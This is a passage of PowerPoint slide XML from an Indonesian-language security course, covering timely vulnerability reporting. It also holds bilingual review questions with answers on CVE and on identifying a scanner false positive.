              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> strategi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mitigasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pelaporan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penundaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaporan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penundaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>remediasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peluang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Laporan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disajikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> format yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jelas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ringkas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipahami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemangku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepentingan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan non-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>implikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>laporan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipahami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tindakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diambil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanggapan</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194</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="385278006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1. This is a dictionary of vulnerabilities in published operating systems and applications software.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Terjemahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kamus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipublikasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>CVE (Common Vulnerabilities and Exposures).</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penjelasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>CVE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> daftar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendokumentasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diketahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>CVE ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>unik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> agar vendor, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peneliti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merujuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebingungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>2. A vulnerability scan reports that a CVE associated with CentOS Linux is present on a host, but you have established that the host is not running CentOS. What type of scanning error event is this?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Terjemahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melaporkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CVE yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CentOS Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CentOS. Jenis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesalahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>False Positive.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penjelasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>False positive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengaitkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CVE pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebenarnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rentan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> fingerprinting yang salah, database scanner yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kurang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>deteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (signature) yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
